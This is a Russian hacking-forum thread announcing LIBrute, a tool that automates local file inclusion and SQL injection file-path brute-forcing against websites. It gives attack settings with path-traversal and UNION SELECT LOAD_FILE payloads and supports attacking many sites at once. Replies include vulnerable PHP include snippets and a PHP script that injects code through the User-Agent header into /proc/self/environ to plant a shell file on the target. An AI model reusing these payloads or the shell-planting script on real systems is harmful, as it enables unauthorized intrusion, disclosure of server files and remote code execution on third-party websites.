LIBrute Небольшая утилита представляет из себя средство автоматизации при проведении LFI. Функционал заключается в подборе файлов на удалённой машине по словарю путём подстановки локального url файла (например: ../../../../../../etc/httpd/conf/httpd.conf) в заданную HTTP-переменную. Словари можно взять от сюда: https://forum.antichat.ru/thread49775.html [ Возможности ] [+] Удобный GUI [+] Поддержка HTTPS [+] Поддержка прокси (HTTP/HTTPS) [+] Настройка авторедиректов [+] Возможность устрановки заголовка User-Agent [+] Возможность устрановки задержки между попытками [+] Возможность установки максимального скачиваемого размера страницы [+] 4 метода атаки: - Query String (для случаев с mod_rewrite) - Get - Post - Cookie (Get) [+] Возможность добавления в запрос дополнительных Post и Cookie переменных, которые будут автоматически добавляться в каждый запрос. [+] Для подстановки имени файла используется макрос {STR} [+] 2 варианта проверки на наличие файла: - по поиску заданной строки в странице - по изменению размера страницы [+] Режим атака сразу нескольких сайтов [+] Редактор настроек для атакуемых сайтов - возможность детальной настройки каждого сайта в отдельности - возможность загрузки списка атакуемых сайтов из файла - автоматический парсинг URL (в URL каждого сайта должен присутствовать макрос {STR} - целевая Get/Post/Cookie переменная передаются в программу одинаково - в виде обычной стоки запроса (http://site.com/?var={STR}%00), тип переменной указывается отдельно [+] Можно использовать сразу несколько словарей (например словарь локаций php.ini + httpd.conf, и т.д.) [+] Имеется возможность кодирования значения в Url или Hex (для атаки через SQL-инъекцию). Примечания: - Программа требует наличия .NET Framework >= 2.0 Примеры использования 1. Ищем файлы через LFI: http://site.com/index.php?page=news&lang=[файл]%00 Настройки для брута будут такими: Code: [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php?page=news[/COLOR] [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR] [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]lang[/COLOR] [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]{STR}%00[/COLOR] [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]по размеру страницы[/COLOR] 2. Ищем файлы через SQL-инъекцию: http://site.com/index.php?id=-1+UNION+SELECT+1,LOAD_FILE([файл]),3-- Настройки: Code: [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php[/COLOR] [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR] [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]id[/COLOR] [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]-1+UNION+SELECT+1,LOAD_FILE({STR}),3--[/COLOR] [COLOR=LemonChiffon]Кодирование:[/COLOR] [COLOR=White]Hex[/COLOR] [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]по размеру страницы[/COLOR] 3. Ищем имя таблицы: http://site.com/index.php?id=-1+UNION+SELECT+1,2,3+FROM+[таблица]-- Настройки: Code: [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php[/COLOR] [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR] [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]id[/COLOR] [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]-1+UNION+SELECT+31337,2,3+FROM+{STR}--[/COLOR] [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]Присутствие текста [I]31337[/I][/COLOR] Как видите, варианты использования ограничиваются только вашей фантазией. Просьба потестить в полевых условиях. [ Скачать ] LIBrute.zip
я такую писал чуть больше 2-х лет назад и выкладывал на ачает в паблике с названием lisearch Функционал предполагал - сразу проверять множество сайтов - поддержка HTTP прокси - таймауты на получение данных - максимальный размер данных которые скачивать (полезно когда инклудиш логи и они могут быть дофига метров) - поле - что искать - поле - чего не должно быть - задание кол-ва потоков - поддержка макроса [X] - куда будет вставлятсья текст - HEX кодирование (если шел подбор через SQL inj через LOAD_FILE) - HTTP кодирование Прожка была сыровата, кривовата, но функции свои выполняла, хаотя и была написана на Delphi ) ----------- Ели нашел свой пост с прожкой - http://forum.antichat.ru/nextnewesttothread45249.html ---------- Но вообще более полезным была бы не прога, а скрипт перловый с web интерфесом потому что каналы серваков намного больше чем юзверьские. Да и юзать из любого места можно, достаточно ввести адрес, авторизоваться и можно работать )
Зачем сразу удалять, будет как альтернатива для комплекта ) Но вообще Perl версия нужнее или хотябы PHP
Вот очень бы хотел ман для "бестолковых" ) хотел бы поэкспереминтировать, только вот не знаю ключевые моменты, такие как Code: Имя переменной: lang Значение переменной: {STR}%00 и другие параметры.. если не сложно - напишите пожалуйста.. Обещаю проверить )))
На GET запросе выглядить будет так: Имя переменной: inc. Значение переменной: article. В итоге запрос будет выглядить будет так: Это был GET. PHP: <?php include($_GET['inc'].'php'.); # Инклуд гетом ?> Про POST почти также, только там формы, пхп код: PHP: <?php include($_POST['inc'].'php'.); #Инклуд постом ?>
Собирался аналогичную писать. ЗЫ прогу потестил. не очень понравилось. слишком навящивый фуннкционал. нахуя там переменую вставлять? нахуя всякие счётчики трафика? в деревне живёшь? короче ТС делать было просто не xyй. надо было сделать поле, куда путь например до /etc/passwd копипаститься. а прога сама отпрасит, где корень, и где какая переменная. и нет автозаливателся шелла в /proc/self/environ , что очень важно. ещё бы можно было добавиь парсер темы с инклудами на ачате. что вообще прекрасно бы было. и ещё надо сделать список с инлудами, чтобы сканить сразу 10 инлудов и пить кофе в это время. короче написано на языке для блондинок (C#), блондином. будет время сам на C++ Builder напишу, а позже и на WinSock перепишу.
Мат неуместен =/, учитесь выражать мысли Такое и на php можно накодить. PS: Добавьте выбор задержки в мс
Как ты собрался брутить если у тебя будет LFI в POST или Cookie? Для красоты.,, Привязка к конкретному сайту - не комильфо с точки зрения архитектуры. Планируется. И вообще, чего ты такой нервный? Расслабься, выпей чаю...
большего бреда в жизни не читал. Автоматизация залития шелла - это сильно (в случае брута путей). Нереально сильно. Вот сам лентяй, но чтобы "шелл ручками было западло залить" - не, ну это шедеврально. Кроме того, что просто глупо.
2 Matnya По твоей логики, можно сказать что Delphi - для умственно отсталых. А если учесть что C++ Builder - это таже жопа, только с другова ракурса, то мне страшно подумать кто ты тогда. Ты жжош. вариант залива шела через него невелик. Темболее что есть куда других альтернатив. И ты предлагаешь их всех реализовывать в проге? Может ты хочешь вообще прогу с полем ввода сайта и кнопкой ХАК?? И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков
Да ладно??!! Я имею автоматизацию залития в /proc/self/environ а не в др. логи. это вполне выполнимо легко. скрипт кодил 1 минуту на пыхе. там тупо код в юзер агент выставляеться. надо сделать так: если /proc/self/environ существует, то прога залвает шелл через него. PHP: <?php $host = "www.ыапывпывпывп.org"; $port = 80; $script = "/index.php?page=../../../../../../../proc/self/environ"; $sock = fsockopen($host,$port); if(!$sock) echo "Error"; else { $head = "POST $script HTTP/1.1\r\n"; $head .= "Host: $host\r\n"; $head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),"<?php phpinfo(); ?>");?>\r\n'; $head .= "Accept-Language: ru\r\n"; $head .= "Content-Type: application/x-www-form-urlencoded\r\n"; $head .= "Content-Lenght: ".strlen("<?php phpinfo(); ?>")."\r\n"; $head .= "\r\n<?php phpinfo(); ?>\r\n"; fwrite($sock,$head); while(!feof($sock)) { $respons .= fgets($sock,1024); } fclose($sock); } ?> ну ты мега-кодер просто не знаеш что такое /proc/self/environ. ты же встётаки масдайщег-кодер если на сайте инлудиться это файлег, то 100% шелл. Бред. Ачат вроде как хек прожект. А те, кто кроме пыха и подстоновки кавычек нихуя больше не умеют, те не хеккеры. Кстати я бы в РОА не брал тех кто не умеют на сях кодить
